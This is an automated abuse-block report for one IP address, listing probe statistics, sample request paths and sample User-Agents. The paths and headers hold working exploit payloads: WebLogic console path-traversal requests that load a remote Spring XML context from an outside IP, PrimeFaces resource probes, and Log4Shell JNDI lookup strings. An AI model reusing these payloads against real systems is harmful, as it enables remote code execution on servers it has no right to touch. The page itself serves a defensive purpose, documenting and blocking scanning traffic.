abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 83
- Unique targets hit
- 6
- Unique paths probed
- 1,362
- Detection count
- 18
- First seen
- 2026-07-07 11:17:46 UTC
- Last seen
- 2026-07-07 11:31:46 UTC
- Block expires
- 2026-07-08 12:17:47 UTC
Sample paths probed
- /wls-wsat/CoordinatorPortType11
- /console/framework/skins/wlsconsole/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://194.138.14.54:42446")
- /console/framework/skins/wlsconsole/css/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://194.138.14.54:42512")
- /console/framework/skins/wlsconsole/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://194.138.14.54:42512")
- /javax.faces.resource/dynamiccontent.properties.jsf
- /console/framework/skins/wlsconsole/css/%252E%252E%252Fconsole.portal
- /console/framework/skins/wlsconsole/images/%252E%252E%252Fconsole.portal
- /PrimeFaces/javax.faces.resource/dynamiccontent.properties.jsf
- /console/framework/skins/wlsconsole/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://194.138.14.54:42446")
- /wls-wsat/ParticipantPortType
- /
- /dynamiccontent.properties.jsf?pfdrt=sc&ln=primefaces&pfdrid=%22wQR45Hj4OwBRgKBtl5v%2FG4elO1lYWl%2BZfvjy1R79FgJ%2F3H%2BKYopezNVswr9KFx%2B8XaKwW6Tq3bG8OxNcX3CjCO5%2F1SsvFbW8gn6BL38vAt03Pz2scc3fGrGm3Vi7A7wdmqDjIu5mWyXWVXipcGirQgAAAAAAAAAA%22&primesecretchk=%22QualysPrimeFacesCheck123456%22
- /login?back=%2F
- /dynamiccontent.properties.jsf
- /console/framework/skins/wlsconsole/images/%252e%252e%252fconsole.portal
- /console/framework/skins/wlsconsole/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://194.138.14.54:42512")
- /console/bea-helpsets/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://194.138.14.54:42512")
- /console/bea-helpsets/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://194.138.14.54:42446")
- /dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=%22wQR45Hj4OwBRgKBtl5v%2FG4elO1lYWl%2BZfvjy1R79FgJ%2F3H%2BKYopezNVswr9KFx%2B8XaKwW6Tq3bG8OxNcX3CjCO5%2F1SsvFbW8gn6BL38vAt03Pz2scc3fGrGm3Vi7A7wdmqDjIu5mWyXWVXipcGirQgAAAAAAAAAA%22&primesecretchk=%22QualysPrimeFacesCheck123456%22
- /api/v1/?format=api
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
- ${jndi:corba://194.138.14.54:43703/QUALYSTEST}
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
- Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
- Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
- ${jndi:rmi://194.138.14.54:46016/QUALYSTEST}
- Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
- Node.js
- TNAS
- Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
- ${jndi:nis://194.138.14.54:43805/QUALYSTEST}
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.